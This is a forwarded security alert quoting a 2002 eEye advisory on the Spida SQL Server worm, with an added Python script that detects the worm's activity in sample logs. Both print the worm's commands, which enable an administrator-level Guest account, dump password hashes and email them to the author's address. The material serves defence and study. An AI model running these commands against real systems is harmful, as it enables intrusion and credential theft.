FYI:
__________________________________________________________
Hello everyone,
A new worm, called Spida Worm, is currently spreading around the world; it is a virus that exploits an SQL Server flaw (during installation SQL Server creates an SA user with no password, by default).
Because they use the SQL Server run-time, the following programs would also be vulnerable:
Access 2000
Visio Enterprise Network Tools
Microsoft Project Central
Compaq Insight Manager Version 7
IBM Director Version 3.1
The effects and other details of this virus are at the bottom of the page.
I hope I have spared you an infection!
Best regards to all and see you soon.
jeff
SQL Worm Analysis
Release Date:
5/22/02
Severity:
High
Systems Affected:
Default installations of Microsoft SQL Server
Description:
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into
MSSQL database servers with no password protecting the SA (System
Administrator) account. The worm executes commands on the vulnerable server
using the "xp_cmdshell" General Extended Procedure, and the commands it
executes activate and configure the Windows "Guest" account so it can be
used to copy files over to the vulnerable machine via Windows file sharing.
After the files have been copied over, they are "hidden" and the worm goes
into a cleanup phase. It deactivates the Guest account and changes the
password for the SA account.
The worm then creates a file containing details about the network
interfaces, database, and Windows account password hashes. This file is
emailed to ixltd@postone.com, which we are guessing is an email box created
by the worm's author. Finally, the target machine begins to scan for other
machines and continues the chain of infection.
Technical Description:
As mentioned before, the SQL worm spreads by inserting itself into MSSQL
database servers that have no password protecting the SA (System
Administrator) account. It executes commands in a command shell (cmd.exe)
using the "xp_cmdshell" General Extended Procedure.
The commands the worm executes are as follows:
net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group "Domain Admins" guest /add
This activates the Guest account, changes the password for the Guest
account, and adds it into higher privilege groups.
Next, the worm "unhides" its files on the infected "attacker" machine, then
it copies itself into the Windows system directory of the vulnerable MSSQL
server. You will not be able to see these files normally because they are
marked "hidden". You can use the "attrib" command from the command shell
(cmd.exe) to unhide and delete them. The description and location of these
files is listed below:
FSCAN portscanner:
%WinDir%\system32\drivers\services.exe
Used to run commands on a remote MSSQL server:
%WinDir%\system32\sqlexec.js
Command Line Emailer:
%WinDir%\system32\clemail.exe
Core worm processing script - contains functionality for scanning,
backdooring, and the sending of retrieved data to the assumed author of the
worm:
%WinDir%\system32\sqlprocess.js
Used for initial worm infection once a vulnerable host is identified:
%WinDir%\system32\sqlinstall.bat
Collects general information about local databases:
%WinDir%\system32\sqldir.js
Simple JavaScript interface to a command shell:
%WinDir%\system32\run.js
Timing library used by the worm:
%WinDir%\system32\timer.dll
SAM library used by pwdump.exe:
%WinDir%\system32\samdump.dll
Grabs password hashes for Windows user accounts; these are not the actual
passwords, but retrieving the actual password is very possible if the
existing passwords are weak:
%WinDir%\system32\pwdump2.exe
Note: %WinDir% is just an environment variable for your Windows base
directory. The shell will replace this with the name of your registered
Windows directory. This is usually "Winnt" or "Windows".
Next the worm will deactivate the Guest account and remove it from the
Administrators and "Domain Admins" groups. After the Guest account is
removed, the worm will also change the SA account password to a random,
four-byte lowercase alpha string. The worm instance on the target machine
now creates a file containing various information about the server it has
just infected. After the file is assembled it is mailed to the assumed
author of the worm. This process is done with the following commands:
shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s >> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to ixltd@postone.com -subject SystemData-" + WScript.Arguments(0), 0, true);
Now the worm triggers the infected target machine to start infecting other
machines in the same manner that it was infected.
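As an added example (not part of the eEye advisory or the worm's own code), the Python script below turns the sequence described above into detection rules: the Guest activation and group-membership commands, then the ipconfig/pwdump2/clemail collection chain. It runs over a few constructed process-creation records; the log line format, host names and the 'two or more stages on one host' threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of process-creation / xp_cmdshell audit records (not real data),
# one per line: "<timestamp> host=<name> parent=<image> cmd=<command line>".
SAMPLE_LOG = """\
2002-05-22T03:10:01 host=db01 parent=sqlservr.exe cmd=net user guest /active:yes
2002-05-22T03:10:02 host=db01 parent=sqlservr.exe cmd=net user guest qwer
2002-05-22T03:10:03 host=db01 parent=sqlservr.exe cmd=net localgroup administrators guest /add
2002-05-22T03:10:04 host=db01 parent=sqlservr.exe cmd=net group "Domain Admins" guest /add
2002-05-22T03:12:10 host=db01 parent=cscript.exe cmd=cmd /c ipconfig /all > send.txt
2002-05-22T03:12:11 host=db01 parent=cscript.exe cmd=cmd /c pwdump2 >> send.txt
2002-05-22T03:12:12 host=db01 parent=cscript.exe cmd=clemail.exe -bodyfile send.txt -to ixltd@postone.com -subject SystemData-db01
2002-05-22T08:00:00 host=db02 parent=explorer.exe cmd=net user guest /active:no
"""

LINE_RE = re.compile(r"^(\S+) host=(\S+) parent=(\S+) cmd=(.*)$")

# Stages of the Spida sequence from the advisory, as patterns over the command line.
# Order matters only for reporting; each stage is recorded once per host.
STAGES = {
    "guest_enabled": re.compile(r"^net user guest /active:yes", re.I),
    # a bare password argument, not a /switch such as /active:no
    "guest_password_set": re.compile(r"^net user guest (?!/)\S+$", re.I),
    "guest_to_admins": re.compile(r"^net (localgroup administrators|group \"?Domain Admins\"?) guest /add", re.I),
    "recon_to_sendfile": re.compile(r"(ipconfig /all|pwdump2|sqldir\.js).*>+ *send\.txt", re.I),
    "exfil_mail": re.compile(r"clemail\.exe .*-to ixltd@postone\.com", re.I),
}


def parse(log):
    """Yield (timestamp, host, parent_image, command_line) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groups()


def find_spida_hosts(log):
    """Return {host: [stages seen, in order]} for hosts showing two or more stages."""
    seen = defaultdict(list)
    for _ts, host, _parent, cmd in parse(log):
        for name, rx in STAGES.items():
            if rx.search(cmd) and name not in seen[host]:
                seen[host].append(name)
    return {h: s for h, s in seen.items() if len(s) >= 2}


if __name__ == "__main__":
    for host, stages in find_spida_hosts(SAMPLE_LOG).items():
        print(host, "->", ", ".join(stages))
```

A single "net user guest /active:no" from an administrator (host db02) does not trip the rule; the full chain on db01 does.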
Removal:
Change your MSSQL Server "SA" password immediately and disable the Windows
Guest account. If you currently use the Guest account then you should
change the password. You should also change passwords for any other account
on an infected machine because upon infection the password hashes for each
account were collected by the worm and emailed to the worm's author. The
passwords may have been retrieved by the author or by anyone in the
communication channel between him and you.
Delete the following registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\Start
HKEY_LOCAL_MACHINE\software\microsoft\mssqlserver\client\connectto\dsquery
Delete the worm files:
attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
del %WinDir%\system32\drivers\services.exe
del %WinDir%\system32\sqlexec.js
del %WinDir%\system32\clemail.exe
del %WinDir%\system32\sqlprocess.js
del %WinDir%\system32\sqlinstall.bat
del %WinDir%\system32\sqldir.js
del %WinDir%\system32\run.js
del %WinDir%\system32\timer.dll
del %WinDir%\system32\samdump.dll
del %WinDir%\system32\pwdump2.exe
Unregister the timer.dll used for scan and infection timing:
regsvr32 /u TIMER.DLL
Prevention:
1) Change the "SA" account password on any MSSQL database server that you
administer so that it is not blank or easy to guess.
2) Get all of the latest Service Packs and Hotfixes from Microsoft to help
prevent general worm infection.
Credit:
Riley Hassell
Related Links:
Free SQL Worm Scanner from eEye Digital Security
http://www.eeye.com/html/Research/Tools/sqlworm.html
SQLSecurity.com
http://sqlsecurity.com/
Trend Micro Analysis
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_SQLSPIDA.B
Network Associates Analysis
http://vil.nai.com/vil/content/v_99499.htm
PWDump info
http://www.polivec.com/pwdump3.html
Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent
of eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at
the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com